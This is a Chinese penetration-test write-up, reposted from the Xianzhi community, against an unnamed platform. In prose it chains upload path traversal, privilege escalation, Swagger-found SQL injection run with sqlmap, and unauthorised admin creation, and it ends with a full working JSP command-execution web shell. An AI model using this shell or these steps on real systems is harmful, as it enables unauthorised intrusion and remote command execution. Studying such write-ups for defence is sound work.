某平台的一次简单渗透测试记录
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。 |
---|
文章来源:先知社区(S1xHcL)
原文地址:https://xz.aliyun.com/t/9374
0x01 目标
某平台系统
0x02 流程
0x03 测试
拿到站点后先做信息收集,扫描目录看看有无敏感信息
寥寥无几,没有任何信息,启动burpsuite打开网站走一遍流程。
在创建目标处存在图片上传接口,上传shell试试。
没有任何过滤,可直接上传,但当前目录不解析,猜测projectKey
控制上传路径
可跨目录上传,但当前/webapp/test/uploadFile/
路径非网站根目录,爆破了常见网站目录但没有一个是正确的解析shell的,先放着后续是否能找到网站根路径然后再跨目录上传。
越权
在浏览到某个页面中看到了一处链接/detail.shtml?key={{id}}
,拿出来浏览器中访问,测测是否存在越权或者SQL注入。
http://www.target.net/detail.shtml?key=1
随便给个数值访问测试,发现只存在水平越权,不存在注入。
http://www.target.net/detail.shtml?key=
去掉参数直接访问,却弹出来了报错页面。
该站点使用的是spring
框架,重新使用spring相关接口路由字典扫一遍,还意外扫到了druid
登录页面,但并不存在未授权访问和弱口令的漏洞,继续看swagger。
在swagger中找到了一处注入和敏感信息泄露。
敏感信息泄露
根据URL猜参数名teamId
,查看到所有的团队信息。
这里也是一处越权。
sql注入
同样猜参数名,未做任何过滤,单引号报错,直接上sqlmap一把梭。
越权添加用户
但翻了翻数据库并未找到管理员账号密码,不过找到了网站接口配置信息,将接口导出然后放到burpsuite里面跑
成功找到了越权添加/编辑用户接口,直接添加新管理员账号并登录。
任意文件上传
回到刚才文件上传处,通过sql注入报错页面我们找到了真实路径/usr/local/test/webapps/ROOT/WEB-INF/classes/mappings/base-mapper.xml]
,修改projectKey
值,用../../../../
跨目录上传shell
0x04 疑问
在最后上传shell处,尝试了冰蝎、哥斯拉的马都无法正常解析,后来更换了带密码回显的jsp马才成功,请问这是什么原因?
<%
if("admin".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
相关文章
- 腾讯乘车码上线两大新功能:终于能再赖一会儿床了
- css首行缩进text-indent的实现
- css文本修饰text-decoration的使用
- Gartner:一季度智能手机发货量出现“有史以来最严重下滑”
- 变局!苹果或斥资1300亿研发造车 强势挖角特斯拉 工厂将落户中国?
- 下代iPad Pro会有什么?miniLED屏、5G、一年两更?
- 传5G版iPhone将采用超声波屏下指纹技术
- 新版QQ上线“神奇按钮”:点一下全世界都清净了
- QQ又更新!一波新功能来袭
- Flutter 体系化建设,阿里有哪些技术沉淀?
- 微软Surface三屏折叠手机专利曝光,新增铰链屏幕区域
- 腾讯QQ小程序微信上被封暂停使用:违反规定
- 暴跌 56%,2 月份的中国手机市场有点惨
- 腾讯健康码累计访问量43亿次:老外也能用
- 加价数万 一机难求:折叠手机是未来趋势还是小众需求?
- OPPO造芯:Top5边缘的远虑和近忧
- 中国手机厂商唯“芯”论可以休矣
- QQ重大更新:腾讯求小学生五星一次付清
- “安卓之父”的新公司倒了:拿到腾讯投资,五年只出了一款手机
- 马化腾发话!腾讯QQ群文件储存量从2G升级至10G